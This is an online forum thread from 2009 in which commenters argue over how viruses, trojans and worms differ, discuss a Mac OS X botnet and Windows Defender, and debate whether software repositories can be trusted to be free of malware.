Even on-access scanners cannot work on first accesss for new 0-day malware.
The point of my post was simply that most AV/anti-malware applications are designed to remove trojans and not only viruses. I wasn’t making any statements about their actual effectiveness – which is what most of your post seems to be talking about.
Edited 2009-04-20 00:59 UTC
My post did not dispute anything from your post. Your post’s text was merely related discussion, and I used your post as introduction, context, and pointing out the relevance of my point, which was equally valid to your point.
Today, there is a Mac OS X-based botnet that relies on a user explicitly downloading and running shady software.
Tomorrow, the user will be taken out of the equation.
Indeed and on that day, there will be some actual news to report.
You misunderstand what a virus is. A virus relies on a stupid user to propagate. It *is* different from trojans, but only in that it copies itself to other applications’ code. When these other applications are then “shared” by stupid users with other stupid users the virus copies itself to other applications. Any OS that runs applications at all can have trojans, and almost any OS can have viruses. Nowadays few people actively share files, so viruses are more rare than in the MS-DOS days.
Anyways, user intervention *is* always needed. They might require a lot or a little bit, but it is always needed.
What you are thinking about are worms. Worms only require a remote vulnerability that allows code execution to spread. Mac OS X has been show to have unpatched remote vulnerabilities, so the only reason that there has been no news release on that is because nobody that knew about them has bothered to write one.
I’m not sure if your reply was to me or the parent of my reply but neither my post nor the parent used the words virus, trojan or any other technical description for what was going on here.
I think the parent referred to it as “shady” software, now I don’t think that’s a new category of malware he’s referring to there, just an all encompassing one.
I was actually planning to stay out of this software-repo stuff but oh well:
Software Repos have been quite a pain for me; I generally visit a software’s website and instead of a clean link I find myself filtering a long list of software; where I may or may not find it considering that either the naming or whatever is wrong; or face sad issues like two version of same software (happened to KDE for me on Kubuntu). Repos are a necessity due to the hostility shown towards installation; but they don’t treat the issue that well.
But even then; the fact that when I try to get a good bunch of software like latest alpha’s or certain proprietary software (like opera); I end up either adding a new URL to the package-manager or downloading a deb package.
That’s reminds me of my university examinations go (i’m still studying btw) — there are about 300 affiliated colleges; so the examiners seem to correct solely on basis of how neat the examination paper looks — to the point that a friend who attempts 1.5 questions in the entire paper gets complete marks for both the questions and passes the examination.
Even in this case; repo’s tend to carry proprietary software and I’m not sure if they get into look into the code..
Proprietary software in repos => Malware chances
Package Downloads => Malware chances
Custom Repos => strange issues + “theoretical” chances of malware
“theoretically” macs were malware-proof too..
@werpu: Yes I know the lines tend to be blurry (despite the apparent distinction demanded in the thread) but Windows Defender’s functionality is only limited to malware, so I said that. The point is that it immediately indicates the installation/presence of a malware; and it’s not like UAC to pop now and then.
I’ve encountered it on only one occassion (*other than msconfig) in the last two years. So unless we’re talking about users like my friend who I posted about; it does its job as intended. User stupidity does count yes, but we’re talking about “real” stupids here not the case of “stupider than the average geek” users.
Personally; I think Defender is underrated; probably ‘cuz it’s Microsoft; or probably cuz the beta wasn’t quite effective. It’s based on GIANT antispyware which was quite a good one in the market at that time. Personally I disdain installing alternatives unless we REALLY need to install one (e.g., IE8. thankfully it’ll come to an end..) or if it comes in suites or so..
Edited 2009-04-20 07:19 UTC
Repeat after me … “impeccable record”. “No malware in open source repositories”.
It gets easier if you practice it a bit.
Edited 2009-04-20 09:53 UTC
Practice what? Reading proprietary lines of code? It’d be easier to practice if it weren’t so hilarious
EDIT:
As for the “impeccable record”, my university has one too… If the repos are clean it’s cuz the PROJECTS are open-source; not cuz of the repositories.
Edited 2009-04-20 12:19 UTC
maybe it gets easier, but it’s still a lie